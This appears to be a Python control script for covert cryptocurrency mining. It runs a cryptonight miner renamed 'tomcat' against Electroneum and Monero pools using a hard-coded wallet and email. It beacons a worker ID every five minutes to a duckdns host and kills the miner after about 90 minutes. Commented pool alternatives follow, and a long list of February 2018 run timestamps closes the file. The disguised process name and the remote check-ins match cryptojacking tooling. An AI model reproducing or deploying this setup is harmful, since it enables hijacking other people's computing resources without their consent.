import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:08:04.127782
#2018-02-17 15:54:05.858674
#2018-02-17 17:41:05.386041
#2018-02-17 19:28:05.286120
#2018-02-17 21:19:04.716442
#2018-02-17 23:03:07.612853
#2018-02-18 00:51:05.489699
#2018-02-18 02:40:06.496750
#2018-02-18 04:28:04.561966
#2018-02-18 06:19:06.975844
#2018-02-18 08:09:05.297489
#2018-02-18 09:55:07.729741
#2018-02-18 11:42:03.742191
#2018-02-18 13:27:05.090309
#2018-02-18 15:17:04.038953
#2018-02-18 17:06:05.308336
#2018-02-18 18:53:04.276447
#2018-02-18 20:41:04.724480
#2018-02-18 22:26:06.673478
#2018-02-19 00:15:07.536249
#2018-02-19 02:01:01.691775
#2018-02-19 03:48:05.595927
#2018-02-19 05:32:06.692553
#2018-02-19 07:20:08.726309
#2018-02-19 09:09:07.890357
#2018-02-19 10:59:01.723523
#2018-02-19 12:46:01.624344
#2018-02-19 14:33:09.406197
#2018-02-19 16:20:09.687022
#2018-02-19 18:06:01.414986
#2018-02-19 19:53:01.818979
#2018-02-19 21:42:06.600178
#2018-02-19 23:28:06.697760
#2018-02-20 01:14:05.814133
#2018-02-20 03:04:04.376638
#2018-02-20 04:52:07.581388
#2018-02-20 06:35:06.120863
#2018-02-20 08:20:06.445591
#2018-02-20 10:05:07.691518
#2018-02-20 11:49:04.422406
#2018-02-20 13:38:05.593042
#2018-02-20 15:23:08.071174
#2018-02-20 17:09:01.253161
#2018-02-20 18:57:09.133100
#2018-02-20 20:45:10.802187
#2018-02-20 22:29:05.783360
#2018-02-21 00:09:06.748180
#2018-02-21 01:54:08.117110
#2018-02-21 03:44:01.503721
#2018-02-21 05:33:06.261376
#2018-02-21 07:22:05.853263
#2018-02-21 09:06:07.724262
#2018-02-21 10:55:04.799855
#2018-02-21 12:42:10.960822
#2018-02-21 14:32:01.411145
#2018-02-21 16:19:01.456295
#2018-02-21 18:12:06.854569
#2018-02-21 19:59:05.962841
#2018-02-21 21:46:01.889647
#2018-02-21 23:34:05.193220
#2018-02-22 01:24:08.498970
#2018-02-22 03:14:01.875567
#2018-02-22 05:01:01.493598
#2018-02-22 06:44:03.818830
#2018-02-22 08:33:05.913100
#2018-02-22 10:20:08.264908
#2018-02-22 12:07:03.966010
#2018-02-22 13:51:13.214942
#2018-02-22 15:38:01.668681
#2018-02-22 17:24:06.763794
#2018-02-22 19:13:08.527576
#2018-02-22 21:05:06.675498
#2018-02-22 22:51:01.291391
#2018-02-23 00:38:09.243224
#2018-02-23 02:24:06.263192
#2018-02-23 04:13:01.636244
#2018-02-23 05:57:05.244879
#2018-02-23 07:46:07.140253
#2018-02-23 09:51:01.556064
#2018-02-23 11:56:02.083858
#2018-02-23 13:46:04.274628
#2018-02-23 15:34:07.619062
#2018-02-23 17:24:04.684050
#2018-02-23 19:12:08.123662
#2018-02-23 20:58:04.655300
#2018-02-23 22:43:04.596208
#2018-02-24 00:30:09.774064
#2018-02-24 02:21:07.329360
#2018-02-24 04:11:01.356759
#2018-02-24 05:59:07.304132
#2018-02-24 07:48:01.638732
#2018-02-24 09:33:03.437993
#2018-02-24 11:27:07.202602
#2018-02-24 13:16:07.491142
#2018-02-24 15:07:06.993277
#2018-02-24 16:56:05.128265
#2018-02-24 18:45:09.214839
#2018-02-24 20:36:01.305279
#2018-02-24 22:40:07.142895
#2018-02-25 01:47:03.810926
#2018-02-25 05:27:06.101733
#2018-02-25 11:35:05.802137